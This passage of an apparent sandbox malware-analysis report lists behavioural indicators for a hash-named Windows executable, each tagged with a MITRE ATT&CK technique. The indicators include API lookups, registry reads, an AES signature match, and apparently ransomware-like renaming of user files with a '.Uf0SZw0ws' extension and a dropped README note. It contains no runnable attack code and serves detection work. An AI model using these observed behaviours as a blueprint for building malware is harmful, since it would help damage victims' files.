00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrintProcessorW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeleteMonitorW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddMonitorW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter StartDocDlgW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AdvancedDocumentPropertiesA (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DocumentPropertiesW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeviceCapabilitiesW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterIC (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter PlayGdiScriptOnPrinterIC (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter CreatePrinterIC (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetJobW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetJobW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumJobsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterDriverDirectoryW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrintersW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrinterConnectionW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterConnectionW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrinterDriverExA (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrinterDriversW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPrintProcessorW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrintProcessorDirectoryW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPrintProcessorDatatypesW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SplDriverUnloadComplete (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter OpenPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter OpenPrinterA (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ResetPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter StartDocPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FlushPrinter (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterDataW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetPrinterDataW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddJobW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ScheduleJob (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter WaitForPrinterChange (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter FindNextPrinterChangeNotification (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter PrinterMessageBoxW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ClosePrinter (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddFormW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeleteFormW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetFormW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetFormW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumFormsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumPortsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EnumMonitorsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter AddPortW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ConfigurePortW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePortW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetPrinterW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter DeletePrinterDriverPackageW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter LpkEditControl (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter ThemeInitApiHook (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter IsProcessDPIAware (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EtwRegisterTraceGuidsW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter LookupAccountSidLocalW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetTokenInformation (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EqualSid (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SystemFunction036 (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetThreadPreferredUILanguages (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter SetThreadPreferredUILanguages (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter LocaleNameToLCID (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter LCIDToLocaleName (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultLocaleName (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"GetProcAddress\" with a parameter EtwUnregisterTraceGuids (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-10", "type": 10, "name": "Loads the RPC (Remote Procedure Call) module DLL", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\System32\\rpcrt4.dll\" at 76870000", "origin": "Loaded Module", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-248", "type": 6, "relevance": 2, "name": "Tries to open documents files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opens a file %USERPROFILE%\\Downloads\\0YdED8h4YnKljVf.doc (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opens a file %USERPROFILE%\\Downloads\\1fdX8.pdf (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opens a file %USERPROFILE%\\Downloads\\35ZarnYhqsU.pdf (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opens a file %USERPROFILE%\\Downloads\\3CrsgVxPsB.doc (UID: 00000000-00004056)\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" opens a file %USERPROFILE%\\Downloads\\59JuNefogVsL0apf.pdf (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-25", "type": 3, "relevance": 3, "name": "Reads information about supported languages", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN-US\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN-US\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\CUSTOMLOCALE\"; Key: \"EN\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\EXTENDEDLOCALE\"; Key: \"EN\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has an executable section named \".text\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has an executable section named \".itext\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has an writable section named \".data\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has an writable section named \".pdata\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-154", "name": "File contains dynamic base/NX flags", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has flags like IMAGE_DLLCHARACTERISTICS_TERMINAL_SERVER_AWARE\n IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE\n IMAGE_DLLCHARACTERISTICS_NX_COMPAT", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" called \"CopyFileW\" (UID: 00000000-00004056)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "module-9", "type": 10, "name": "Loads the Bcrypt module DLL", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" loaded module \"%WINDIR%\\System32\\bcrypt.dll\" at 756C0000", "origin": "Loaded Module", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "mutant-0", "type": 4, "relevance": 3, "name": "Creates mutants", "description": "\"\\Sessions\\1\\BaseNamedObjects\\Global\\d603996df3a1ed67253bba5655942318\"\n \"Global\\d603996df3a1ed67253bba5655942318\"", "origin": "Created Mutant"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-72", "type": 3, "relevance": 3, "name": "Overview of unique CLSIDs touched in registry", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"Windows Management and Instrumentation\" (Path: \"HKCU\\CLSID\\{8BC3F05E-D86B-11D0-A075-00C04FB68820}\\LOCALSERVER32\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"WbemAdministrativeLocator Class\" (Path: \"HKCU\\CLSID\\{CB8555CC-9128-11D1-AD9B-00C04FD8FDFF}\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"Microsoft WBEM Call Context\" (Path: \"HKCU\\CLSID\\{674B6698-EE92-11D0-AD71-00C04FD8FDFF}\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"PSFactoryBuffer\" (Path: \"HKCU\\CLSID\\{7C857801-7381-11CF-884D-00AA004B2E24}\\TREATAS\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IWbemServices\" (Path: \"HKCU\\CLSID\\{D68AF00A-29CB-43FA-8504-CE99A996D9EA}\\TREATAS\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject\" (Path: \"HKCU\\CLSID\\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\\TREATAS\")\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" touched \"Microsoft WBEM WbemClassObject Marshalling proxy\" (Path: \"HKCU\\CLSID\\{4590F812-1D3A-11D0-891F-00AA004B2E24}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9\" file has an entrypoint instructions - \"nop\t,nop\tword ptr [eax + eax],call\t0x419000,nop\tword ptr [eax + eax],call\t0x40639c,nop\tword ptr [eax + eax],call\t0x409960,nop\tword ptr [eax + eax],call\t0x4173b4,nop\tword ptr [eax + eax],push\t0,call\tdword ptr [0x4255c8],nop\tdword ptr [eax + eax],call\t0x418d28,call\t0x418d2e,call\t0x418d16,call\t0x418d1c,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Pattern Matching", "identifier": "yara-103", "type": 13, "relevance": 5, "name": "YARA signature match - AES encryption", "description": "YARA signature for AES encryption matched on process \"00000000-00004056\"\n YARA signature for AES encryption matched on file \"sample.bin\"", "origin": "YARA Signature", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "string-455", "type": 2, "relevance": 3, "name": "Contains reference to multiple windows system processes", "description": "Found strings \"svchost.exe,spoolsv.exe,smss.exe,csrss.exe,wininit.exe\" (Source: \"00000000-00004056.00000000.192882.001F0000.00000004.mdmp, 00000000-00004056.00000001.194804.001F0000.00000004.mdmp, 00000000-00004056.00000002.196726.001F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-37", "type": 8, "relevance": 3, "name": "Drops files inside appdata directory", "description": "Dropped file: \"Uf0SZw0ws.README.txt\" - Location: [%LOCALAPPDATA%\\Programs\\Python\\Python38-32\\Lib\\site-packages\\pythonwin\\pywin\\framework\\Uf0SZw0ws.README.txt]- [targetUID: 00000000-00004056]", "origin": "Binary File", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\wtsapi32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\RstrtMgr.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\ncrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\bcrypt.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\netapi32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\netutils.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\srvcli.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\wkscli.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\SAMCLI.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\LOGONCLI.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\activeds.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\adsldpc.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\ATL.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\wsock32.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\mpr.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\gpedit.dll\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" trying to access non-existent file \"C:\\dsuiext.dll\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\dotnet.au3.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\favorites\\microsoft websites\\microsoft store.url.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\favorites\\links for united states\\usa.gov.url.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0n7wbcx6f.rar.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0rer5x.txt.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\downloads\\0yded8h4ynkljvf.doc.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\downloads\\10ybabsxu.mp3.uf0szw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" reads file \"c:\\users\\%osuser%\\downloads\\1f5wjj2.gif.uf0szw0ws\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-159", "type": 6, "relevance": 1, "name": "Writes log files", "description": "\"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\cert8.db.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\g4h7miqt.default\\secmod.db.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Macromedia\\Flash Player\\openssl\\cache\\RevocationCacheFile.dat.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeARM.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\AdobeARM_NotLocked.log.Uf0SZw0ws\"\n \"3facc153ed82a72695ee2718084db91f85e2560407899e1c7f6938fd4ea011e9.exe\" writes a file 